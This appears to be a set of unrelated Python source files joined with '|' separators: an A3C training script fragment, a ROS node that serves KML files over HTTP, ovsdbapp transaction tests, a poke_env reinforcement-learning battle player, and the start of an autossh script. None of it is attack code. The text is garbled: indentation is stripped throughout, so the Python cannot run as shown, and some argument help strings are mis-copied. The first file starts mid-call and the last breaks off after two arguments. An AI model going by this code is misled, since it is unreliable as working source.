help='entropy term coefficient (default: 0.01)')
parser.add_argument('--value-loss-coef', type=float, default=0.5,
help='value loss coefficient (default: 0.5)')
parser.add_argument('--max-grad-norm', type=float, default=GRAD_NORM_CLIP,
help='value loss coefficient (default: 40)')
parser.add_argument('--seed', type=int, default=1,
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4,
help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=20,
help='number of forward steps in A3C (default: 20)')
parser.add_argument('--max-episode-length', type=int, default=MAX_TIME_STEP,
help='maximum length of an episode (default: 1000000)')
parser.add_argument('--env-name', default='bathroom_02',
help='environment to train on (default: bathroom_02)')
parser.add_argument('--no_shared', default=False,
help='environment to train on (default: bathroom_02)')
if __name__ == '__main__':
torch.multiprocessing.set_start_method('spawn')
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['CUDA_VISIBLE_DEVICES'] = ""
list_of_tasks = TASK_LIST
scene_scopes = list_of_tasks.keys()
args = parser.parse_args()
torch.manual_seed(args.seed)
#env = create_atari_env(args.env_name)
shared_model = ActorCriticFFNetwork(ACTION_SIZE)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedRMSprop(shared_model.parameters(), lr=args.lr, alpha = args.alpha, eps = args.eps)
optimizer.share_memory()
processes = []
counter = mp.Value('i', 0)
lock = mp.Lock()
'''
p = mp.Process(target=test, args=(args.num_processes, args, shared_model, counter))
p.start()
processes.append(p)
'''
branches = []
for scene in scene_scopes:
for task in list_of_tasks[scene]:
branches.append((scene, task))
NUM_TASKS = len(branches)
if os.path.exists(CHECKPOINT_DIR + '/' + 'checkpoint.pth.tar'):
checkpoint = torch.load(CHECKPOINT_DIR + '/' + 'checkpoint.pth.tar',
map_location = lambda storage,
loc: storage)
# set global step
shared_model.load_state_dict(checkpoint)
print("Model loaded")
else:
print("Could not find old checkpoint")
for rank in range(0, args.num_processes):
scene, task = branches[rank%NUM_TASKS]
p = mp.Process(target=test, args=(rank ,scene, task, args, shared_model, counter))
#p = mp.Process(target=train, args=(rank ,scene, task, args, shared_model, counter, lock, optimizer))
p.start()
processes.append(p)
for p in processes:
p.join()
'''
print('Now saving data. Please wait.')
torch.save(shared_model.state_dict(),
CHECKPOINT_DIR + '/' + 'checkpoint.pth.tar')
'''
|
add_kml.py
|
#!/usr/bin/env python
from std_msgs.msg import String
from lg_common.srv import USCSMessage
from interactivespaces_msgs.msg import GenericMessage
import SimpleHTTPServer
import SocketServer
import threading
import tempfile
import rospy
import json
import copy
import os
DEFAULT_VIEWPORTS = ['left_three', 'left_two', 'left_one', 'center',
'right_one', 'right_two', 'right_three']
DEFAULT_EARTH_INSTANCE = {
u'activity': u'earth',
u'activity_config': {},
u'assets': [],
u'height': 1920,
u'presentation_viewport': u'CHANGE_ME',
u'slug': -1875729098,
u'width': 1080,
u'x_coord': 0,
u'y_coord': 0
}
class KMLAdder():
def __init__(self, uscs_service, director_pub, port, hostname='localhost', viewports=None):
self.serve_dir = tempfile.mktemp()
self.uscs_service = uscs_service
self.director_pub = director_pub
self.hostname = hostname
self.viewports = viewports
if self.viewports is None:
self.viewports = DEFAULT_VIEWPORTS
self.port = port
self.server = threading.Thread(target=self._serve)
os.mkdir(self.serve_dir)
self.server.start()
def handle_kml(self, msg):
kml = msg.data
filename = tempfile.mktemp(dir=self.serve_dir)
with open(filename, 'w') as f:
f.write(kml)
current_scene = self.uscs_service.call().message
current_scene = json.loads(current_scene)
self.add_earths(current_scene)
for window in current_scene['windows']:
if window['activity'] != 'earth':
continue
window['assets'].append('http://{}:{}/{}'.format(self.hostname, self.port, os.path.basename(filename)))
new_msg = GenericMessage()
new_msg.type = 'json'
new_msg.message = json.dumps(current_scene)
self.director_pub.publish(new_msg)
def _serve(self):
os.chdir(self.serve_dir)
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
self.httpd = SocketServer.TCPServer(("", self.port), Handler)
self.httpd.serve_forever()
def add_earths(self, scene):
for viewport in self.viewports:
flag = False
for window in scene['windows']:
if window['activity'] == 'earth' and window['presentation_viewport'] == viewport:
flag = True
# if no instance of earth w/ our current viewport is found
# we add one and give it our viewport
if flag is False:
scene['windows'].append(copy.deepcopy(DEFAULT_EARTH_INSTANCE))
scene['windows'][-1]['presentation_viewport'] = viewport
def shutdown(self):
self.httpd.shutdown()
self.server.join()
def main():
rospy.init_node('add_kml')
director_pub = rospy.Publisher('/director/scene', GenericMessage, queue_size=10)
uscs_service = rospy.ServiceProxy('/uscs/message', USCSMessage)
hostname = rospy.get_param('~hostname', 'localhost')
port = rospy.get_param('~port', 18111)
k = KMLAdder(uscs_service, director_pub, port, hostname)
rospy.Subscriber('/lg_earth/add_kml', String, k.handle_kml)
rospy.on_shutdown(k.shutdown)
rospy.spin()
if __name__ == '__main__':
main()
|
test_api.py
|
# Copyright (c) 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
from unittest import mock
import fixtures
import testtools
from ovsdbapp import api
from ovsdbapp.tests import base
try:
import eventlet
from eventlet.green import thread
sleep = eventlet.sleep
def create_thread(executable):
eventlet.spawn_n(executable)
except ImportError:
import threading
import time
sleep = time.sleep
def create_thread(executable):
thread = threading.Thread(target=executable)
thread.start()
class GreenThreadingFixture(fixtures.Fixture):
def _setUp(self):
if 'eventlet' in sys.modules:
self._orig = api.threading.get_ident
api.threading.get_ident = thread.get_ident
self.addCleanup(self.cleanup)
def cleanup(self):
api.threading.get_ident = self._orig
class FakeTransaction(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, tb):
self.commit()
def commit(self):
"""Serves just for mock."""
class TestingAPI(api.API):
def create_transaction(self, check_error=False, log_errors=True, **kwargs):
txn = FakeTransaction()
mock.patch.object(txn, 'commit').start()
return txn
TestingAPI.__abstractmethods__ = set()
class TransactionTestCase(base.TestCase):
def setUp(self):
super(TransactionTestCase, self).setUp()
self.api = TestingAPI()
self.useFixture(GreenThreadingFixture())
def test_transaction_nested(self):
with self.api.transaction() as txn1:
with self.api.transaction() as txn2:
self.assertIs(txn1, txn2)
txn1.commit.assert_called_once_with()
def test_transaction_nested_false(self):
with self.api.transaction(nested=False) as txn1:
with self.api.transaction() as txn2:
self.assertIsNot(txn1, txn2)
txn1.commit.assert_called_once_with()
txn2.commit.assert_called_once_with()
def test_api_level_transaction_nested_fales(self):
api = TestingAPI(nested_transactions=False)
with api.transaction() as txn1:
with api.transaction() as txn2:
self.assertIsNot(txn1, txn2)
txn1.commit.assert_called_once_with()
txn2.commit.assert_called_once_with()
def test_transaction_no_nested_transaction_after_error(self):
class TestException(Exception):
pass
with testtools.ExpectedException(TestException):
with self.api.transaction() as txn1:
raise TestException()
with self.api.transaction() as txn2:
self.assertIsNot(txn1, txn2)
def test_transaction_nested_multiple_threads(self):
shared_resource = []
def thread1():
with self.api.transaction() as txn:
shared_resource.append(txn)
while len(shared_resource) == 1:
sleep(0.1)
shared_resource.append(0)
def thread2():
while len(shared_resource) != 1:
sleep(0.1)
with self.api.transaction() as txn:
shared_resource.append(txn)
shared_resource.append(0)
create_thread(thread1)
create_thread(thread2)
while len(shared_resource) != 4:
sleep(0.1)
txn1, txn2 = shared_resource[:2]
self.assertNotEqual(txn1, txn2)
|
env_player.py
|
# -*- coding: utf-8 -*-
"""This module defines a player class exposing the Open AI Gym API.
"""
from abc import ABC, abstractmethod, abstractproperty
from gym.core import Env # pyre-ignore
from queue import Queue
from threading import Thread
from typing import Any, Callable, List, Optional, Tuple, Union, Dict
from poke_env.environment.abstract_battle import AbstractBattle
from poke_env.environment.battle import Battle
from poke_env.player.battle_order import BattleOrder, ForfeitBattleOrder
from poke_env.player.player import Player
from poke_env.player_configuration import PlayerConfiguration
from poke_env.server_configuration import ServerConfiguration
from poke_env.environment.side_condition import SideCondition
from poke_env.teambuilder.teambuilder import Teambuilder
from poke_env.utils import to_id_str
import asyncio
import numpy as np # pyre-ignore
import time
class EnvPlayer(Player, Env, ABC): # pyre-ignore
"""Player exposing the Open AI Gym Env API. Recommended use is with play_against."""
_ACTION_SPACE = None
_DEFAULT_BATTLE_FORMAT = "gen8randombattle"
MAX_BATTLE_SWITCH_RETRY = 200#int(10e6)
PAUSE_BETWEEN_RETRIES = 0.001
def __init__(
self,
player_configuration: Optional[PlayerConfiguration] = None,
*,
avatar: Optional[int] = None,
battle_format: Optional[str] = None,
log_level: Optional[int] = None,
save_replays: Union[bool, str] = False,
server_configuration: Optional[ServerConfiguration] = None,
start_listening: bool = True,
start_timer_on_battle_start: bool = False,
team: Optional[Union[str, Teambuilder]] = None,
):
"""
:param player_configuration: Player configuration. If empty, defaults to an
automatically generated username with no password. This option must be set
if the server configuration requires authentication.
:type player_configuration: PlayerConfiguration, optional
:param avatar: Player avatar id. Optional.
:type avatar: int, optional
:param battle_format: Name of the battle format this player plays. Defaults to
gen8randombattle.
:type battle_format: Optional, str. Default to randombattles, with specifics
varying per class.
:param log_level: The player's logger level.
:type log_level: int. Defaults to logging's default level.
:param save_replays: Whether to save battle replays. Can be a boolean, where
True will lead to replays being saved in a potentially new /replay folder,
or a string representing a folder where replays will be saved.
:type save_replays: bool or str
:param server_configuration: Server configuration. Defaults to Localhost Server
Configuration.
:type server_configuration: ServerConfiguration, optional
:param start_listening: Whether to start listening to the server. Defaults to
True.
:type start_listening: bool
:param start_timer_on_battle_start: Whether to automatically start the battle
timer on battle start. Defaults to False.
:type start_timer_on_battle_start: bool
:param team: The team to use for formats requiring a team. Can be a showdown
team string, a showdown packed team string, of a ShowdownTeam object.
Defaults to None.
:type team: str or Teambuilder, optional
"""
super(EnvPlayer, self).__init__(
player_configuration=player_configuration,
avatar=avatar,
battle_format=battle_format
if battle_format is not None
else self._DEFAULT_BATTLE_FORMAT,
log_level=log_level,
max_concurrent_battles=1,
server_configuration=server_configuration,
start_listening=start_listening,
start_timer_on_battle_start=start_timer_on_battle_start,
team=team,
save_replays=save_replays,
)
self._actions = {}
self._current_battle: AbstractBattle
self._observations = {}
self._reward_buffer = {}
self._alive_buffer = {}
self._health_buffer = {}
self._start_new_battle = False
@abstractmethod
def _action_to_move(
self, action: int, battle: AbstractBattle
) -> BattleOrder: # pragma: no cover
"""Abstract method converting elements of the action space to move orders."""
def _battle_finished_callback(self, battle: AbstractBattle) -> None:
self._observations[battle].put(self.embed_battle(battle))
def _init_battle(self, battle: AbstractBattle) -> None:
self._observations[battle] = Queue()
self._actions[battle] = Queue()
def choose_move(self, battle: AbstractBattle) -> BattleOrder:
if battle not in self._observations or battle not in self._actions:
self._init_battle(battle)
self._observations[battle].put(self.embed_battle(battle))
action = self._actions[battle].get()
return self._action_to_move(action, battle)
def close(self) -> None:
"""Unimplemented. Has no effect."""
def complete_current_battle(self) -> None:
"""Completes the current battle by forfeiting."""
self._actions[self._current_battle].put(-1)
def compute_reward(self, battle: AbstractBattle) -> float:
"""Returns a reward for the given battle.
The default implementation corresponds to the default parameters of the
reward_computing_helper method.
:param battle: The battle for which to compute the reward.
:type battle: AbstractBattle
:return: The computed reward.
:rtype: float
"""
return self.reward_computing_helper(battle)
@abstractmethod
def embed_battle(self, battle: AbstractBattle) -> Any: # pragma: no cover
"""Abstract method for embedding battles.
:param battle: The battle whose state is being embedded
:type battle: AbstractBattle
:return: The computed embedding
:rtype: Any
"""
def reset(self) -> Any:
"""Resets the internal environment state. The current battle will be set to an
active unfinished battle.
:return: The observation of the new current battle.
:rtype: Any
:raies: EnvironmentError
"""
try:
if self._current_battle.finished is False:
self.complete_current_battle()
except AttributeError:
pass
for _ in range(self.MAX_BATTLE_SWITCH_RETRY):
battles = dict(self._actions.items())
battles = [b for b in battles if not b.finished]
if battles:
self._current_battle = battles[0]
observation = self._observations[self._current_battle].get()
return observation
time.sleep(self.PAUSE_BETWEEN_RETRIES)
else:
raise EnvironmentError("User %s has no active battle." % self.username)
def render(self, mode="human") -> None:
"""A one line rendering of the current state of the battle."""
print(
" Turn %4d. | [%s][%3d/%3dhp] %10.10s - %10.10s [%3d%%hp][%s]"
% (
self._current_battle.turn,
"".join(
[
"⦻" if mon.fainted else "●"
for mon in self._current_battle.team.values()
]
),
self._current_battle.active_pokemon.current_hp or 0,
self._current_battle.active_pokemon.max_hp or 0,
self._current_battle.active_pokemon.species,
self._current_battle.opponent_active_pokemon.species,
self._current_battle.opponent_active_pokemon.current_hp or 0,
"".join(
[
"⦻" if mon.fainted else "●"
for mon in self._current_battle.opponent_team.values()
]
),
),
end="\n" if self._current_battle.finished else "\r",
)
def reward_computing_helper(
self,
battle: AbstractBattle,
*,
fainted_value: float = 0.0,
hp_value: float = 0.0,
number_of_pokemons: int = 6,
starting_value: float = 0.0,
status_value: float = 0.0,
victory_value: float = 1.0,
rocks_value: float = 0.0,
) -> float:
"""A helper function to compute rewards.
The reward is computed by computing the value of a game state, and by comparing
it to the last state.
State values are computed by weighting different factor. Fainted pokemons,
their remaining HP, inflicted statuses and winning are taken into account.
For instance, if the last time this function was called for battle A it had
a state value of 8 and this call leads to a value of 9, the returned reward will
be 9 - 8 = 1.
Consider a single battle where each player has 6 pokemons. No opponent pokemon
has fainted, but our team has one fainted pokemon. Three opposing pokemons are
burned. We have one pokemon missing half of its HP, and our fainted pokemon has
no HP left.
The value of this state will be:
- With fainted value: 1, status value: 0.5, hp value: 1:
= - 1 (fainted) + 3 * 0.5 (status) - 1.5 (our hp) = -1
- With fainted value: 3, status value: 0, hp value: 1:
= - 3 + 3 * 0 - 1.5 = -4.5
:param battle: The battle for which to compute rewards.
:type battle: AbstractBattle
:param fainted_value: The reward weight for fainted pokemons. Defaults to 0.
:type fainted_value: float
:param hp_value: The reward weight for hp per pokemon. Defaults to 0.
:type hp_value: float
:param number_of_pokemons: The number of pokemons per team. Defaults to 6.
:type number_of_pokemons: int
:param starting_value: The default reference value evaluation. Defaults to 0.
:type starting_value: float
:param status_value: The reward value per non-fainted status. Defaults to 0.
:type status_value: float
:param victory_value: The reward value for winning. Defaults to 1.
:type victory_value: float
:return: The reward.
:rtype: float
"""
if battle not in self._reward_buffer:
self._reward_buffer[battle] = starting_value
current_value = 0
for mon in battle.team.values():
current_value += mon.current_hp_fraction * hp_value
if mon.fainted:
current_value -= fainted_value
elif mon.status is not None:
current_value -= status_value
current_value += (number_of_pokemons - len(battle.team)) * hp_value
for mon in battle.opponent_team.values():
current_value -= mon.current_hp_fraction * hp_value
if mon.fainted:
current_value += fainted_value
elif mon.status is not None:
current_value += status_value
current_value -= (number_of_pokemons - len(battle.opponent_team)) * hp_value
if battle.won:
current_value += victory_value
elif battle.lost:
current_value -= victory_value
#print(battle.opponent_side_conditions)
#print("sr check", battle.opponent_side_conditions.get(SideCondition.STEALTH_ROCK,3))
#sys.exit(1)
#stealth rocks
if battle.opponent_side_conditions.get(SideCondition.STEALTH_ROCK, None) is not None:
current_value += rocks_value
if battle.side_conditions.get(SideCondition.STEALTH_ROCK,None) is not None:
current_value -= rocks_value
to_return = current_value - self._reward_buffer[battle]
self._reward_buffer[battle] = current_value
return to_return
def reward_computing_helper2(
self,
battle: AbstractBattle,
*,
fainted_value: float = 0.0,
hp_value: float = 0.0,
number_of_pokemons: int = 6,
starting_value: float = 0.0,
status_value: float = 0.0,
victory_value: float = 1.0,
rocks_value: float = 0.0,
) -> float:
"""A helper function to compute rewards.
The reward is NOT!!!!!!!! computed by computing the value of a game state, and by comparing
it to the last state.
State values are computed by weighting different factor. Fainted pokemons,
their remaining HP, inflicted statuses and winning are taken into account.
For instance, if the last time this function was called for battle A it had
a state value of 8 and this call leads to a value of 9, the returned reward will
be 9 - 8 = 1.
Consider a single battle where each player has 6 pokemons. No opponent pokemon
has fainted, but our team has one fainted pokemon. Three opposing pokemons are
burned. We have one pokemon missing half of its HP, and our fainted pokemon has
no HP left.
The value of this state will be:
- With fainted value: 1, status value: 0.5, hp value: 1:
= - 1 (fainted) + 3 * 0.5 (status) - 1.5 (our hp) = -1
- With fainted value: 3, status value: 0, hp value: 1:
= - 3 + 3 * 0 - 1.5 = -4.5
:param battle: The battle for which to compute rewards.
:type battle: AbstractBattle
:param fainted_value: The reward weight for fainted pokemons. Defaults to 0.
:type fainted_value: float
:param hp_value: The reward weight for hp per pokemon. Defaults to 0.
:type hp_value: float
:param number_of_pokemons: The number of pokemons per team. Defaults to 6.
:type number_of_pokemons: int
:param starting_value: The default reference value evaluation. Defaults to 0.
:type starting_value: float
:param status_value: The reward value per non-fainted status. Defaults to 0.
:type status_value: float
:param victory_value: The reward value for winning. Defaults to 1.
:type victory_value: float
:return: The reward.
:rtype: float
"""
if battle not in self._reward_buffer:
self._reward_buffer[battle] = starting_value
if battle not in self._alive_buffer:
self._alive_buffer[battle] = {"player": number_of_pokemons, "opponent": number_of_pokemons}
if battle not in self._health_buffer:
player_health_dict = {}
for mon in battle.team.values():
player_health_dict[mon._species] = 1
opponent_health_dict = {}
for mon in battle.opponent_team.values():
opponent_health_dict[mon._species] = 1
self._health_buffer[battle] = {"player": player_health_dict, "opponent": opponent_health_dict}
current_value = 0
alive_pokemon = {"player": number_of_pokemons, "opponent": number_of_pokemons}
player_health_dict = {}
for mon in battle.team.values():
player_health_dict[mon._species] = mon.current_hp_fraction
if mon.fainted:
alive_pokemon["player"] -= 1
else:
pass
opponent_health_dict = {}
for mon in battle.opponent_team.values():
#for opps, this is always a percentage
opponent_health_dict[mon._species] = mon.current_hp_fraction
if mon.fainted:
alive_pokemon["opponent"] -= 1
else:
pass
delta_player_health = 0
for mon_name in player_health_dict:
delta_player_health += self._health_buffer[battle]["player"][mon_name] - player_health_dict[mon_name]
delta_opponent_health = 0
for mon_name in opponent_health_dict:
#we only add mons into this dict once they are visible
delta_opponent_health += self._health_buffer[battle]["opponent"].get(mon_name, 1) - opponent_health_dict[mon_name]
delta_health = delta_opponent_health #- delta_player_health TODO WE DISABLED THIS!
current_value += delta_health * hp_value
delta_pokemon_us = alive_pokemon["player"] - self._alive_buffer[battle]["player"]
current_value += delta_pokemon_us * fainted_value #negative value
delta_pokemon_opponent = self._alive_buffer[battle]["opponent"] - alive_pokemon["opponent"]
current_value += delta_pokemon_opponent * fainted_value #positive value
if battle.won:
current_value += victory_value
elif battle.lost:
current_value -= victory_value
self._alive_buffer[battle] = alive_pokemon
self._health_buffer[battle] = {"player": player_health_dict, "opponent": opponent_health_dict}
'''print("reward", current_value)
print("delta_pokemon_opponent", delta_pokemon_opponent)
print("delta_pokemon_us", delta_pokemon_us)
print("delta_opponent_health", delta_opponent_health)
print("delta_player_health", delta_player_health)
a = input(" ")'''
return current_value
def seed(self, seed=None) -> None:
"""Sets the numpy seed."""
np.random.seed(seed)
def step(self, action: int) -> Tuple:
"""Performs action in the current battle.
:param action: The action to perform.
:type action: int
:return: A tuple containing the next observation, the reward, a boolean
indicating wheter the episode is finished, and additional information
:rtype: tuple
"""
if self._current_battle.finished:
raise ValueError(
"The previous episode is finished. To start a new one, please call reset."
)
else:
self._actions[self._current_battle].put(action)
observation = self._observations[self._current_battle].get()
return (
observation,
self.compute_reward(self._current_battle),
self._current_battle.finished,
{},
)
def play_against(
self, env_algorithm: Callable, opponent: Player, env_algorithm_kwargs=None
):
"""Executes a function controlling the player while facing opponent.
The env_algorithm function is executed with the player environment as first
argument. It exposes the open ai gym API.
Additional arguments can be passed to the env_algorithm function with
env_algorithm_kwargs.
Battles against opponent will be launched as long as env_algorithm is running.
When env_algorithm returns, the current active battle will be finished randomly
if it is not already.
:param env_algorithm: A function that controls the player. It must accept the
player as first argument. Additional arguments can be passed with the
env_algorithm_kwargs argument.
:type env_algorithm: callable
:param opponent: A player against with the env player will player.
:type opponent: Player
:param env_algorithm_kwargs: Optional arguments to pass to the env_algorithm.
Defaults to None.
"""
self._start_new_battle = True
async def launch_battles(player: EnvPlayer, opponent: Player):
battles_coroutine = asyncio.gather(
player.send_challenges(
opponent=to_id_str(opponent.username),
n_challenges=1,
to_wait=opponent.logged_in,
),
opponent.accept_challenges(
opponent=to_id_str(player.username), n_challenges=1
),
)
await battles_coroutine
def env_algorithm_wrapper(player, kwargs):
env_algorithm(player, **kwargs)
player._start_new_battle = False
while True:
try:
player.complete_current_battle()
player.reset()
except OSError:
break
loop = asyncio.get_event_loop()
if env_algorithm_kwargs is None:
env_algorithm_kwargs = {}
thread = Thread(
target=lambda: env_algorithm_wrapper(self, env_algorithm_kwargs)
)
thread.start()
while self._start_new_battle:
loop.run_until_complete(launch_battles(self, opponent))
thread.join()
@abstractproperty
def action_space(self) -> List:
"""Returns the action space of the player. Must be implemented by subclasses."""
pass
class Gen4EnvSinglePlayer(EnvPlayer): # pyre-ignore
_ACTION_SPACE = list(range(4 + 6))
_DEFAULT_BATTLE_FORMAT = "gen4randombattle"
def _action_to_move( # pyre-ignore
self, action: int, battle: Battle
) -> BattleOrder:
"""Converts actions to move orders.
The conversion is done as follows:
action = -1:
The battle will be forfeited.
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 10
The action - 4th available switch in battle.available_switches is executed.
If the proposed action is illegal, a random legal move is performed.
:param action: The action to convert.
:type action: int
:param battle: The battle in which to act.
:type battle: Battle
:return: the order to send to the server.
:rtype: str
"""
if action == -1:
return ForfeitBattleOrder()
elif (
action < 4
and action < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action])
elif 0 <= action - 4 < len(battle.available_switches):
return self.create_order(battle.available_switches[action - 4])
else:
return self.choose_random_move(battle)
@property
def action_space(self) -> List:
"""The action space for gen 7 single battles.
The conversion to moves is done as follows:
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 10
The action - 4th available switch in battle.available_switches is executed.
"""
return self._ACTION_SPACE
class Gen5EnvSinglePlayer(Gen4EnvSinglePlayer): # pyre-ignore
_DEFAULT_BATTLE_FORMAT = "gen5randombattle"
class Gen6EnvSinglePlayer(EnvPlayer): # pyre-ignore
_ACTION_SPACE = list(range(2 * 4 + 6))
_DEFAULT_BATTLE_FORMAT = "gen6randombattle"
def _action_to_move( # pyre-ignore
self, action: int, battle: Battle
) -> BattleOrder:
"""Converts actions to move orders.
The conversion is done as follows:
action = -1:
The battle will be forfeited.
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 8:
The action - 8th available move in battle.available_moves is executed, with
mega-evolution.
8 <= action < 14
The action - 8th available switch in battle.available_switches is executed.
If the proposed action is illegal, a random legal move is performed.
:param action: The action to convert.
:type action: int
:param battle: The battle in which to act.
:type battle: Battle
:return: the order to send to the server.
:rtype: str
"""
if action == -1:
return ForfeitBattleOrder()
elif (
action < 4
and action < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action])
elif (
battle.can_mega_evolve
and 0 <= action - 4 < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action - 4], mega=True)
elif 0 <= action - 8 < len(battle.available_switches):
return self.create_order(battle.available_switches[action - 8])
else:
return self.choose_random_move(battle)
@property
def action_space(self) -> List:
"""The action space for gen 7 single battles.
The conversion to moves is done as follows:
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 8:
The action - 8th available move in battle.available_moves is executed, with
mega-evolution.
8 <= action < 14
The action - 8th available switch in battle.available_switches is executed.
"""
return self._ACTION_SPACE
class Gen7EnvSinglePlayer(EnvPlayer): # pyre-ignore
_ACTION_SPACE = list(range(3 * 4 + 6))
_DEFAULT_BATTLE_FORMAT = "gen7randombattle"
def _action_to_move( # pyre-ignore
self, action: int, battle: Battle
) -> BattleOrder:
"""Converts actions to move orders.
The conversion is done as follows:
action = -1:
The battle will be forfeited.
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 8:
The action - 4th available move in battle.available_moves is executed, with
z-move.
8 <= action < 12:
The action - 8th available move in battle.available_moves is executed, with
mega-evolution.
12 <= action < 18
The action - 12th available switch in battle.available_switches is executed.
If the proposed action is illegal, a random legal move is performed.
:param action: The action to convert.
:type action: int
:param battle: The battle in which to act.
:type battle: Battle
:return: the order to send to the server.
:rtype: str
"""
if action == -1:
return ForfeitBattleOrder()
elif (
action < 4
and action < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action])
elif (
not battle.force_switch
and battle.can_z_move
and battle.active_pokemon
and 0
<= action - 4
< len(battle.active_pokemon.available_z_moves) # pyre-ignore
):
return self.create_order(
battle.active_pokemon.available_z_moves[action - 4], z_move=True
)
elif (
battle.can_mega_evolve
and 0 <= action - 8 < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action - 8], mega=True)
elif 0 <= action - 12 < len(battle.available_switches):
return self.create_order(battle.available_switches[action - 12])
else:
return self.choose_random_move(battle)
def gen8_legal_action_mask(self, battle : Battle, switches_on=False) -> List:
legal_actions = [0] * 22
if not battle.force_switch:
for i in range(0, len(battle.available_moves)):
legal_actions[i] = 1
if battle.can_z_move:
for i in range(4, 4+len(battle.active_pokemon.available_z_moves)):
legal_actions[i] = 1
if battle.can_mega_evolve:
for i in range(8, 8 + len(battle.available_moves)):
legal_actions[i] = 1
if battle.can_dynamax:
for i in range(12, 12 + len(battle.available_moves)):
legal_actions[i] = 1
if switches_on == True:
for i in range(16, 16 + len(battle.available_switches)):
legal_actions[i] += 1
return legal_actions
@property
def action_space(self) -> List:
"""The action space for gen 7 single battles.
The conversion to moves is done as follows:
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 8:
The action - 4th available move in battle.available_moves is executed,
with z-move.
8 <= action < 12:
The action - 8th available move in battle.available_moves is executed,
with mega-evolution.
12 <= action < 18
The action - 12th available switch in battle.available_switches is
executed.
"""
return self._ACTION_SPACE
def legal_action_mask(self, battle : Battle) -> List:
legal_actions = [0] * 18
if not battle.force_switch:
for i in range(0, len(battle.available_moves)):
legal_actions[i] = 1
if battle.can_z_move:
for i in range(4, 4+len(battle.active_pokemon.available_z_moves)):
legal_actions[i] = 1
if battle.can_mega_evolve:
for i in range(8, 8 + len(battle.available_moves)):
legal_actions[i] = 1
for i in range(12, 12 + len(battle.available_switches)):
legal_actions[i] += 1
return legal_actions
class Gen8EnvSinglePlayer(EnvPlayer): # pyre-ignore
_ACTION_SPACE = list(range(4 * 4 + 6))
_DEFAULT_BATTLE_FORMAT = "gen8randombattle"
def start_of_battle_procedure(self, battle_idx: int):
return None
def _action_to_move( # pyre-ignore
self, action: int, battle: Battle
) -> BattleOrder:
"""Converts actions to move orders.
The conversion is done as follows:
action = -1:
The battle will be forfeited.
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 8:
The action - 4th available move in battle.available_moves is executed, with
z-move.
8 <= action < 12:
The action - 8th available move in battle.available_moves is executed, with
mega-evolution.
8 <= action < 12:
The action - 8th available move in battle.available_moves is executed, with
mega-evolution.
12 <= action < 16:
The action - 12th available move in battle.available_moves is executed,
while dynamaxing.
16 <= action < 22
The action - 16th available switch in battle.available_switches is executed.
If the proposed action is illegal, a random legal move is performed.
:param action: The action to convert.
:type action: int
:param battle: The battle in which to act.
:type battle: Battle
:return: the order to send to the server.
:rtype: str
"""
if action == -1:
return ForfeitBattleOrder()
elif (
action < 4
and action < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action])
elif (
not battle.force_switch
and battle.can_z_move
and battle.active_pokemon
and 0
<= action - 4
< len(battle.active_pokemon.available_z_moves) # pyre-ignore
):
return self.create_order(
battle.active_pokemon.available_z_moves[action - 4], z_move=True
)
elif (
battle.can_mega_evolve
and 0 <= action - 8 < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action - 8], mega=True)
elif (
battle.can_dynamax
and 0 <= action - 12 < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action - 12], dynamax=True)
elif 0 <= action - 16 < len(battle.available_switches):
return self.create_order(battle.available_switches[action - 16])
else:
return self.choose_random_move(battle)
@property
def action_space(self) -> List:
"""The action space for gen 8 single battles.
The conversion to moves is done as follows:
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 8:
The action - 4th available move in battle.available_moves is executed,
with z-move.
8 <= action < 12:
The action - 8th available move in battle.available_moves is executed,
with mega-evolution.
12 <= action < 16:
The action - 12th available move in battle.available_moves is executed,
while dynamaxing.
16 <= action < 22
The action - 16th available switch in battle.available_switches is
executed.
"""
return self._ACTION_SPACE
def gen8_legal_action_mask(self, battle : Battle, switches_on=True) -> List:
legal_actions = [0] * 22
if not battle.force_switch:
for i in range(0, len(battle.available_moves)):
legal_actions[i] = 1
if battle.can_z_move:
for i in range(4, 4+len(battle.active_pokemon.available_z_moves)):
legal_actions[i] = 1
if battle.can_mega_evolve:
for i in range(8, 8 + len(battle.available_moves)):
legal_actions[i] = 1
if battle.can_dynamax:
for i in range(12, 12 + len(battle.available_moves)):
legal_actions[i] = 1
if switches_on == True or sum(legal_actions) == 0:
for i in range(16, 16 + len(battle.available_switches)):
legal_actions[i] += 1
return legal_actions
|
autossh.py
|
#!/usr/bin/env python3
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from __future__ import unicode_literals
import os
import time
import sys
import threading
from subprocess import Popen, PIPE, STDOUT
import traceback
import json
import argparse
import re
import datetime
# parse args
parser = argparse.ArgumentParser()
parser.add_argument('--config', default=sys.argv[0] + '.conf', help='config file location')
parser.add_argument('--ssh-user', help='ssh user for ssh connection')
